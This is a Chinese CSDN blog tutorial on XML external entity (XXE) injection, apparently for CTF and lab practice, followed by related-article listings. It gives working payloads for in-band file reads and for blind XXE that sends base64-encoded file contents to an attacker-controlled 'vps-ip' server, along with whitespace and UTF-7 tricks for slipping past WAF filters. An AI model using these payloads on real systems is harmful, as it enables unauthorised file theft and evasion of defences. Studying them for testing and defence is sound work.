XML外部实体注入;XXE漏洞;XXE有回显注入;XXE无回显注入;Blind XXE;绕过方式总结

已于 2022-04-28 10:16:08 修改
阅读量3.9k 收藏 24
点赞数 4
分类专栏: CTF刷题 web安全 渗透测试 文章标签: 安全 java web
于 2021-03-30 22:20:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43749601/article/details/115330101
版权
本文详细解读XXE漏洞,涉及原理、环境配置、回显注入与无回显注入实例,包括如何利用base64编码和绕过WAF的方法。还介绍了如何通过构建XML实体链获取敏感信息的攻击步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞原理

XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可以加载恶意外部文件,造成文件读取、命令执行、内网端口扫描。XXE漏洞触发的点往往是可以上传XML文件的位置,没有对上传的XML文件进行过滤,导致可上传恶意XML文件

环境搭建

地址:https://github.com/c0ny1/xxe-lab
下载好后将PHP_XXE放到PHPstudy的www目录下就可以访问
在这里插入图片描述

XXE有回显注入

在登录处先抓一下包,可以看到是参数的传递格式是XML,可能存在XML注入。
在这里插入图片描述
将数据包发送到Repeater模块,进行下一步的分析。
在这里插入图片描述
可以看到响应包里回显的内容为username,接着使用XXE漏洞进行文件读取。
在这里插入图片描述
读取txt文件时可以直接读取,但是在读取php文件时php代码可能会因为浏览器的解析而无法显示,这是需要将代码进行base64编码后再进行读出。

php://filter/read=convert.base64-encode/resource=文件地址

在这里插入图片描述
base64解码便可以获取abc.php的内容
在这里插入图片描述

XXE无回显注入

当一个Web程序可以解析XML输入,但却无任何输出响应这种注入叫做盲注XXE。所以为了测试这种盲注XXE,我们可以用非文件路径的外部实体来请求这里的Web应用。

这里借用CTFShow的一道题目进行讲解。
https://ctf.show/challenges#web4_%E8%A7%82%E5%BF%83-340
在这里插入图片描述
点击占卜,抓包看一下数据。看到它请求了一个外部的xml,可以推测存在XXE注入。
在这里插入图片描述
同时因为是从公网上的服务器发起请求,所以我们需要在自己的服务器上构造一个攻击链
首先开启Apache服务,把我们所构造的文件放在/var/www/html下,以便我们能访问到。

service apache2 start

创建一个test.xml

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert-base64.encode/resource=/flag.txt">
<!ENTITY % remote SYSTEM "http://vps-ip/test.dtd">
%remote;
%dtd;
%xxe;
]>

创建一个test.dtd

<!ENTITY % dtd "<!ENTITY xxe SYSTEM 'http://vps-ip/pass=%file;'>">
%dtd;
%xxe;

然后发起请求
在这里插入图片描述
得到flag。

方法二

攻击payload

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [
<!ENTITY % remote SYSTEM "http://vps-ip/test.dtd">
%remote;%dtd;%xxe;
]>

test.dtd

<!ENTITY % file SYSTEM "php://filter/read=convert-base64.encode/resource=/flag.txt">
<!ENTITY % dtd "<!ENTITY xxe SYSTEM 'http://vps-ip/pass=%file;'>">
  • remote代表远程攻击机上的dtd文件,dtd的内容是file和dtd实体
  • xxe代表的是在dtd中镶嵌的另一个实体,它的作用是将file实体读取到的内容当作dtd实体的值

绕过方式

空格绕过

通常XXE漏洞存在于XML文档的开头,有的WAF会检测XML文档中开头中的某些子字符串或正则表达式,但是XML格式在设置标签属性的格式时允许使用任何数量的空格,因此我们可以在<?xml?><!DOCTYPE>中插入数量足够多的空格去绕过WAF的检测。
原文

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert-base64.encode/resource=/flag.txt">
<!ENTITY % remote SYSTEM "http://vps-ip/test.dtd">
%remote;
%dtd;
%xxe;
]>

绕过

<?xml              



                                                                                                                                                                                                                                                                         
version="1.0" encoding="utf-8"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert-base64.encode/resource=/flag.txt">
<!ENTITY % remote SYSTEM "http://vps-ip/test.dtd">
%remote;
%dtd;
%xxe;
]>

编码绕过

当服务端对一些关键词过滤时(SYSTEM ENTITY)时,可以使用UTF-7绕过
https://www.motobit.com/util/charset-codepage-conversion.asp
原文

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert-base64.encode/resource=/flag.txt">
<!ENTITY % remote SYSTEM "http://vps-ip/test.dtd">
%remote;
%dtd;
%xxe;
]>

绕过

<?xml version="1.0" encoding="utf-7"?>
+ADwAIQ-DOCTYPE test +AFs-
+ADwAIQ-ENTITY +ACU- file SYSTEM +ACI-php://filter/read+AD0-convert-base64.encode/resource+AD0-/flag.txt+ACIAPg-
+ADwAIQ-ENTITY +ACU- remote SYSTEM +ACI-http://vps-ip/test.dtd+ACIAPg-
+ACU-remote+ADs-
+ACU-dtd+ADs-
+ACU-xxe+ADs-
+AF0APg-
XXE(XML外部实体注入)漏洞
2ed
08-01 1002
如果你的应用是通过用户上传处理XML文件或POST请求(例如将SAML用于单点登录服务甚至是RSS)的,那么你很有可能会受到XXE的攻击。XXE是一种非常常见的漏洞类型,我们几乎每天都会碰到它 什么是XXE 简单来说,XXE全称是——XML External Entity,就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内...
java xml 实体注入_XML外部实体注入漏洞(XXE)
weixin_35917998的博客
02-16 1235
转自腾讯安全应急响应中心一、XML基础知识XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明,也可以外部引用。内部声明DTD根元素 [元素声明]>引...
Burpsuite靶场之XML外部实体XXE注入(有回显+无回显
weixin_68906849的博客
11-02 2040
XML外部实体XXE注入,带你打burpsuite的靶场!
xxe漏洞提取无回显数据
qq_42307546的博客
01-26 626
<?php $string_xml = '<?xml version="1.0" encoding="utf-8"?><note><to>George</to><from>John</from><heading>Reminder</heading><body>xml 实体注入</body></note>'; $xml = isset($_GET['xml'])?$_GET
【2025版】最新防范XXE漏洞XXE攻击详解与应对策略,从零基础到精通,收藏这篇就够了!
Libra1313的博客
02-19 1147
在当今网络安全形势日益严峻的环境中,XXEXML External Entity)漏洞作为一种常见的XML解析安全问题,得到了越来越多的关注。首先,XXE漏洞利用了XML解析器在处理外部实体时的安全缺陷,攻击者可以通过精心构造的XML文档,读取系统内部敏感文件、执行任意命令,甚至进行内部网络探测。一旦系统遭到攻击,可能导致数据泄露、服务中断甚至更为严重的后果,因此,了解并防范XXE漏洞非常重要。针对这一漏洞,禁用DTD及外部实体的解析是最直接且有效的方式
WEB常见漏洞XXE,从零基础到精通,收藏这篇就够了!
最新发布
yy1715713348的博客
03-11 886
内部声明 DTD` `<!DOCTYPE 根元素 [元素声明]>``引用外部 DTD` `<!DOCTYPE 根元素 PBULIC "public_ID" "文件名">``/或者``<!DOCTYPE 根元素 SYSTEM "文件名">(1) 包含内部实体的 XML 文档>` `<!</c1. 包含外部实体XML 文档>``<!</c>0x03 漏洞利用1.XML 解析器解析外部实体时支持多种协议1.有回显XXE回显的情况可以直接在页面中看到Payload的执行结果或现象。
无回显练习~XXE注入
weixin_67832625的博客
07-31 299
XML外部实体注入XML Extenrnal Entity Injection),简称XXE漏洞。引发XXE漏洞的主要原因是XML解析依赖库libxml默认开启了对外部实体的引用,导致服务端在解析用户提交的XML信息时未作处理直接进行解析,导致加载恶意的外部文件和代码,造成任意文件读取,命令执行(利用条件苛刻)、内网扫描等危害。
mysql注入 无回显_XML外部实体注入2:无回显XXE
weixin_42309785的博客
01-28 546
生如夏花之绚烂,死如秋叶之静美。—— 泰戈尔 《生如夏花》01XML基础XML首先要先说下 xmlxml 是一种可扩展的标记语言,主要就是用来传输数据的,你可以理解为就是一种写法类似于 html 语言的数据格式文档。但是 xml 跟 html 是为不同目的而设计的,html 旨在显示数据信息,而 xml 旨在传输数据信息。而且xml的标签是自己自定义,且标签一定要闭合,语法比html严格(毕竟h...
XXE漏洞复现(有无回显
cainiao17441898的博客
07-01 1936
环境:这里可以在metasploitable中进行试验,不可以在centos中进行试验,因为默认情况下centos中已经修复相关漏洞。libxml2.9.0之后默认不执行外部实体。用命令:rpm -qa | grep libxml可以去查看libxml的版本。 复现: 先去生成一个解析xml数据并打印传入的数据的一个php文件。 <?php $xml=file_get_contents("php://input"); $data = simplexml_load_string($xml) ; e
XMLXXE漏洞 XML外部实体注入攻击
qq_60115503的博客
05-24 1353
XXE:XML External Entity即外部实体,从安全角度理解成XML External attack外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者通过ENTITY伪造外部实体构成,比如PHP中simplexml_load默认情况下会解析外部实体,XXE标志性函数simplexml_load_string()
XXE无回显(使用vps-payload外带)
per_se_veran_ce的博客
03-22 2435
1、抓包写入payload 2、vps根目录下存放evil.dtd文件,监听端口设置为1333 3、开启端口监听 4、Burpsuite发送请求包 5、vps监听获得/etc/passwd的base64编码 6、解码 ...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXEXML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
WEB安全XXE实体注入漏洞.pdf
12-12
然而,XML的这种灵活性也引入了安全风险,如XXEXML External Entity Injection,XML外部实体注入漏洞)。 **0x01 XML基础知识** XML文档由XML声明、DTD(Document Type Definition)文档类型定义(可选)和文档...
xxe-xml外部实体注入
nigo134的博客
07-27 3151
一、XXE 是什么 介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将
xxe盲注
qq_62046696的博客
03-18 974
当然除了这些,还有一种方式代替一些符号比如百分号%,参数实体的百分号%也不能出现在实体值中,这个时候我们可以用Unicode编码,%=% 也可以写做16进制 ,%=%=%外部实体+参数实体的二重调用%errorr1;%errorr;
XXE漏洞快速入门(回显问题)
z1900552728的博客
04-28 789
xxe发生在应用解析xml输入的时候,没有禁止外部实体加载,被恶意利用,加载外部xml文件,如果服务器执行被恶意插入的代码,就可以实现攻击的目的攻击者可以通过构造恶意内容,就可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等危害。
xxe主看这个1】学习xxe稍微进阶的知识 ---- OOB xxe盲注,外带
Zero_Adam的博客
04-12 1706
目录:1. 基本知识2.XML安全性问题当文件内容和 xml 格式相冲突的时候,其他利用 https://www.freebuf.com/video/209186.html 这个是那个pvs的网站,要学习一下curl命令,然后就可以当作一个vps来用了 https://beeceptor.com/console/qwert 1. 基本知识 xml是一种可扩展标记语言,和html类似, 主要区别是 HTML 主要和 数据表示相关。而xml 更多与数据传输和存储有关。 xml可以用在这些地方,等等 我们现在
XXE漏洞(下)
errorr0
04-10 1255
XXE注入攻击
XXE漏洞中DOCTYPE、ENTITY傻傻分不清-WEB安全基础入门—XML外部实体注入(XXE)
Eason_LYC安全白帽子的成长博客
07-20 3064
XML外部实体注入XXEWEB安全系列包括如下三个专栏: 《WEB安全基础-服务器端漏洞》 《WEB安全基础-客户端漏洞》 《WEB安全高级-综合利用》 知识点全面细致,逻辑清晰、结合实战,并配有大量练习靶场,让你读一篇、练一篇,掌握一篇,在学习路上事半功倍,少走弯路! 欢迎关注订阅专栏! 专栏文章追求对知识点的全面总结,逻辑严密,方便学习掌握。力求做到看完一篇文章,掌握一类漏洞知识。让读者简洁高效的掌握WEB安全知识框架,推开入门深造的大门。 绝不为了追求文章数量,彰显内容丰富而故意拆散相关知识
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值